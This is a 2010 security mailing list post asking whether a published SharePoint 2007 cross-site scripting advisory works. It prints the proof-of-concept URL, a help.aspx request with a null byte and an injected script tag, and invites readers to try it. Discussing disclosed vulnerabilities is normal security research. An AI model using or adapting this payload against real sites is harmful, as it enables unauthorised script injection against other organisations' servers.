Dailydave mailing list archives
Sharepoint FTW! :>
From: dave <dave () immunityinc com>
Date: Thu, 29 Apr 2010 15:48:43 -0400
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Has anyone checked out this Sharepoint 2007 XSS? Does it work? Sharepoint is one of the single largest data security risks in most large Enterprises and everyone pretty much ignores it, which is always funny. :> http://www.htbridge.ch/advisory/xss_in_microsoft_sharepoint_server_2007.html This is the string that's supposed to work. Someone try it and let us all know! :> http://host/_layouts/help.aspx?cid0=MS.WSS.manifest.xml%00%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&tid=X - -dave (Note: I'm recovering from an illness - your emails will be answered in the order they were received!) -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iEYEARECAAYFAkvZ4psACgkQtehAhL0ghep4lQCcDY4wc2y9Icx/1oyd+oFgNMun VPwAnAnc4dDlUFXVyS3NtsKHdkyG/Q73 =eAv+ -----END PGP SIGNATURE----- _______________________________________________ Dailydave mailing list Dailydave () lists immunitysec com http://lists.immunitysec.com/mailman/listinfo/dailydave
Current thread:
- Sharepoint FTW! :> dave (Apr 29)
- Re: Sharepoint FTW! :> pUm (Apr 30)
- Re: Sharepoint FTW! :> Steve Shockley (Apr 30)
- Re: Sharepoint FTW! :> NeZa (Apr 30)